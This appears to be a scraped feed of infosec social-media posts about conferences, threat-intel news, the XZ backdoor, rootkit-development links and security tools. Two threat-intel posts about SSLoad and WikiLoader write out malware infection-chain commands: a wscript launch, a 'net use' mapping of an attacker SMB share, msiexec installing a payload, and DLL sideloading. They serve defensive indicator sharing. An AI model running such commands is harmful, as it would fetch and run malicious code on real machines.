Ready to board for Botconf in Nice 😀

Hope to see you there 😉

Maybe I‘ll give a lightning talk again 😎

#botconf #botconf 24

Red teaming and adversary emulation: series on Windows rootkits development
Credits Ido Veltzman

Part 1: idov31.github.io/2022/07/14/lor…
Part 2: idov31.github.io/2022/08/04/lor…
Part 3: idov31.github.io/2022/10/30/lor…
Part 4: idov31.github.io/2023/02/24/lor…
PArt 5: idov31.github.io/2023/07/19/lor…

#windows #infosec

A GitHub flaw lets attackers upload executables that appear to be hosted on a company's official repo, such as Microsoft's—without the repo owner knowing anything about it.

The following URLs, for example, make it seem like these ZIPs are present on Microsoft's source code repo:

MITRE was compromised

Shout out Charles Clancy for full disclosure and his transparency.

'The most obvious sort of pivotal moment to me is their movement into wartime operations.' Gabby Roncone 🇺🇦 🇵🇸

A Decade of Sandworm: Digging into APT44’s Past and Future decipher.sc/a-decade-of-sa… #decipher #decipher sec

Want to know how to actually defend your business? Here's this one simple trick....

It's called PLANNING and following a sensible process! I know, THIS SECRET can be yours:

head to:

pwndefend.com for more SECRET cyber TIPS!

A 13 year old coded a botnet control framework that utilizes pastebin and github for control of hosts in red teaming…

This makes the hacker in me so hopeful.

Check out pastebomb when it’s dropped!

I just came across a tool called AttackGen. It's a simple tool that generates incident scenarios based on a Threat Actor and suggests simulations and possible detections at a high level. #llm #python #threatintel

👉 code: github.com/mrwadams/attac…
👉 app: attackgen.streamlit.app

#SSLoad - #TA578 - url > .js > smb > .msi

wscript.exe Doc_m42_81h118103-88o62135w8623-1999q9.js

net use A: \\krd6.]com@80\share\ /persistent:no

msiexec.exe /I avp.msi

msiexec.exe /V

(1/3) 👇

IOC's
github.com/pr0xylife/SSLo…

Splunk researchers look into the tactics, techniques and procedures employed by APT29 in a recent campaign. The attack chain begins with a spear-phishing email leading to the delivery of the WINELOADER backdoor. splunk.com/en_us/blog/sec…

#WikiLoader - #TA544 - .pdf > url > .zip > .js > .js > .dll

wscript Invoice_818493.js

wscript out.js

C:\Users\Admin\AppData\Local\Temp\npp.8.6.4.portable.x64\notepad.exe (sideload)👇

\npp.8.6.3.portable.x64\plugins\mimeTools.dll

(1/3) 👇

IOC's
github.com/pr0xylife/Wiki…

Critical Atlassian Flaw Exploited to Deploy Linux Variant of Cerber Ransomware thehackernews.com/2024/04/critic…

#MalwareChallenge 👇👇
Andrea De Pasquale
Cryptolaemus
ExecuteMalware
hazmalware
James
JAMESWT
Joe Roosen
James Quinn
lc4m
MalwareHunterTeam
Microsoft Threat Intelligence
John Lambert
neonprimetime
ps66uk
Racco42
Nilanjana
Hugo Rifflet
Hash Miser

🔎Researchers are working hard but still need to conclude the XZ backdoor analysis and determine whether it has alternative communication channels or triggers.
🎁The xz-min project by Felipe Contreras is a way to easily reproduce the XZ backdoor to study it:
github.com/felipec/xz-min

super interesting backdoor design 🐍📜🧹

XZ backdoor story – Initial analysis.

Unlike other supply chain attacks we have seen in Node.js, PyPI, FDroid, and the Linux Kernel that mostly consisted of atomic malicious patches, fake packages and typosquatted package names, this incident was a multi-stage operation that

🎁 Today I'm giving away 3 of our DFIR Labs! 🎁

To enter:
✅Follow me
✅RT & Like this post
✅Reply with which case you'd like to take

The winners will be selected in 24 hours. #Giveaway